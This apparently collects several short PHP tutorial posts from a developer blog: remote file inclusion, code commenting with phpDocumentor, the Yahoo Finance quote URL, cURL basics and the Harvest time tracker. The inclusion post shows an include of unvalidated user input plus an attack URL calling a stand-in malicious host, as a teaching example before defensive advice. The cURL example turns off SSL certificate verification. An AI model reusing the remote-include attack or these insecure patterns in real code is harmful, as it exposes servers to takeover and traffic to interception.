MDBitz Development Resources

Remote Code Execution is a security vulnerability in where a malicious user manipulates input or a url to run code from a remote location.  Unlike Cross Site Scripting XSS where only the user is affected Remote Code Execution could run scripts that delete all files on your server. This security risk like most vulnerabilities comes from insufficient validation of user input to the Application.

Vulnerability Example

Lets imagine we built a dynamic application that takes a page query parameter to determine what php page to be used for displaying to the user. In this case the back end code could look something like:

$page = $_GET['page']
include $page

As you may notice a malicious user could manipulate the query parameter to point to a file on their own server.

http://www.example.com/?page=<em>http://www.evil-site-name.com/destroy.php</em>

Doing so would cause their file to run with the permissions of your own server giving them access to your server to delete or modify content in addition to finding out server information.

How to Protect your code

Protecting your codes is a simple practice, Validate user input! Verify the information your users enter matches what you are expecting, or make sure that it is properly escaped. The best method to use is White List as in you check input against allowed values unlike Black Listing where you try to check against invalid input, in most cases their are a lot more invalid cases then valid cases. To check if your are vulnerable look to see if you run exec include, require, file_get_contents, or similar functions on user input without testing to see that they inputted what you were expecting even if it is a post variable.

Why spend the time to comment your code?

As a programmer we spend our time writing code from simple one line scripts to complex applications. No matter what the size adding comments and documenting your code adds to the longevity of your project.  The reason I say this is that if you write a library to perform a certain set of operations or to interact with a protocol or app you have a choice to spend the time adding in comments or to get it down faster you could leave them out.  Lets say a year goes by and all of a sudden the interface you integrate with has been upgraded. You or those that utilize your code are now faced with a dilemma:  update the existing code, or rewrite from scratch.  If you had taken the time to well document your code then their is a better chance that your code will be updated as you or the developers should be able to easily find the elements that need to be modified or replaced. Also by well documenting your code in an open source environments allows the code to be easily enhanced or debugged for a users particular needs.

In-line commenting

In-line commenting is the placement of comments inside of function calls to describe what action the line is performing.  This type of commenting is up to the programmer on how much needs to be included. Some programmers choice to only comment sections that contain obscure functionality or special cases, others prefer to comment every line. Myself, I find that their is a balance to be drown in describing what a section of code performs in addition to any critical pieces.

// executes the curl request
$result = curl_exec($ch)

File, Class, Method, and Property Documenting

Arguably documenting on the method, property, and class level is the most important aspect of documentation.  By well documenting these elements a user can quickly and easily know what functions they need to interact with and how to go about using the various classes.  phpDocumentor is the standard auto-documenting tool for the php language. It functions similar to javadocs in that you write comment block headers for functions, parameters, classes, and php files the describe what the elements purpose is and the various parameters that go into it.

For example a method comment block would contain a description of the method, any parameters that are expected, return value information, and also details on any Exceptions that could be thrown. For a full list of all available tags you can review the tutorial at phpDocumentor’s main website

/**
* Method for importing existing schema to Doctrine_Record classes
*
* @param string $directory Directory to write your models to
* @param array $databases Array of databases to generate models for
* @param array $options Array of options
* @return boolean
* @throws Exception
*/
public static function generateModelsFromDb($directory, array $databases = array(), array $options = array())
{
    return Doctrine_Manager::connection()->import->importSchema($directory, $databases, $options);
}

Conclusion

Commenting makes it possible for other programmers from beginners to advanced to easily review and understand your code. To further help users phpDocumentor has the ability to build and export customizable html pages that can be used by users as a reference for utilizing the code without looking at the source code. This is extremely helpful for users of libraries that only need to know how to use the code and not how it actually works. How to install and use the doc builder is outlined in the phpDocumentor tutorial.

Yahoo Finance Stock API?

The Yahoo Finance Stock API appears to be both commonly and uncommonly known to the public.  The API is most easily seen by performing a stock quote search on the Yahoo Finance website and then selecting the “Download Data” link in the page details.  Looking at the link would show a url that looks similar to http://download.finance.yahoo.com/d/quotes.csv?s=DELL&f=sl1d1t1c1ohgv&e=.csv, this is the Yahoo Finance Stock API.

Deciphering the URL

We can break up the url into 4 distinct elements:

1. Base URL of the request
   http://download.finance.yahoo.com/d/quotes.csv
   
2. Stock Symbols that you want to obtain information are is passed by a plus (+) delimited string set to the s parameter of the query.
   s=DELL+RHI
   
3. Fields that you want are passed by obscure letter codes sent by the f parameter of the query. A sample of values that can be obtained are found at the end of this entry. One important item to notice is that there is no space or delimiting characters between the options.
   f=sl1d1t1c1ohgv
   
4. Return Format of the data which will most likely always be csv is set by the e query parameter
   e=.csv

Placing all that information together you can easily obtain financial information on any stock including but not limited to such information as the latest stock quote, daily high + low, 52 week high + low, the day’s range, previous day’s close, and today’s open price.  Creating a simple PHP or AJAX script would allow you to quickly show your website visitors how stocks are doing.

Sample list of data codes

• g : Day’s Low
• h:  Day’s High
• o: Open
• p: Previous Close
• n: name
• w2: 52 Week Range
• l1: Latest Stock Quote

Resources

• YahooFinanceAPI – PHP Library for accessing Yahoo Stock Finances
• AJAX & JSONP Example – How to pull in Stock information utilizing AJAX and JSONP

What is cURL?

Client URL Library or cURL for short is a library of functions designed for the purpose of safely fetching information from remote sites.  The purpose of the library is to send a request to a server using a defined protocol (http, https, ftp, etc) and to return the result back to you for usage in your application or script.

How do I use cURL?

Using cURL is a simple 4 or 5 step process depending on your needs.

1. Initate a cURL session utilizing curl_init(). This function returns a session handler that you will use for manipulation the request.

   $ch = curl_init("http://www.example.com/");

2. Set your options for the request utilizing the curl_setopt() function. You can either set these options one at a time or pass an associated array that contains all your options. Complete options can be found at the php.net curl_setopt page but a few basic ones are:
   • CURLOPT_RETURNTRANSFER
     determines if the result should be outputted as string or directly
   • CURLOPT_SSL_VERIFYHOST
     determines if the host’s SSL Certificate should be verified
   • CURLOPT_POST
     set the request to use HTTP POST protocol
   • CURLOPT_POSTFIELDS
     set the post parameters to be sent with the request

   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

3. Execute the cURL request and if using return transfer as string then set it to a variable.

   $resp = curl_exec($ch)

4. This is the optional step in that you can obtain information about the request you just performed. One of the main usages is to return the HTTP_CODE that was returned to determine if the request was successfull or if there was an error. To do this you utilize the curl_getinfo() function, full documentation can be found on the php.net curl_getinfo page.

   $code = curl_getinfo($ch,CURLINFO_HTTP_CODE);

5. Finally once completed you will want to close your session to free up resources. This is done by using the curl_close() function.

   curl_close($ch);

Summary

Utilizing the cURL library in your application to talk to remote servers allows you to easily interact with available APIs that are provided by Harvest, Google Analtyics and others. In addition it provides security to your application as you are not running any external scripts on your server only sending a request and obtaining its output.

What is Harvest?

Harvest is, simply put, an online time tracking application. Harvest works on the basic concept that your time is recorded on a per project basis and that each project belongs to a client. This allows you to easily generate an invoice for a project or at the client level depending on your own billing needs. In addition your time can be recorded against tasks to get detailed reports on where your time is spent on a project.  Some of the key features of Harvest are outline below.

Features

• Time Tracking
  Harvest has an online interface for entering your time as well as desktop applications.
• Budgets
  Harvest allows you to set budgets on a project or for specific tasks. Allowing you to easily see what projects are over budget or determining what tasks are consistently over budget to determine if you need to allocate more resources or take further action
• Reports
  Harvest has various reports from project statuses, invoices, expenses, and detailed time tracking of users, tasks, and projects.
• Quickbooks Integration
  Harvest has the built in ability to export time sheets to Quickbooks if you use it for billing and reporting
• Basecamp Integration
  built in integration with basecamp project management software
• API
  Harvest provides both a Time Tracking API and an extended REST API for easily accessing and managing data. Allowing Harvest Users to easily integrate harvest reports or account management into their own applications.

Summary

Harvest is available with 3 different pricing plans, ranging in price from $12 to $90 per month.  For those just starting out they offer a 30 day free trial and a free account that allows you to track 4 active clients and 2 active projects.  Visit Harvest’s website to learn more and sign-up today.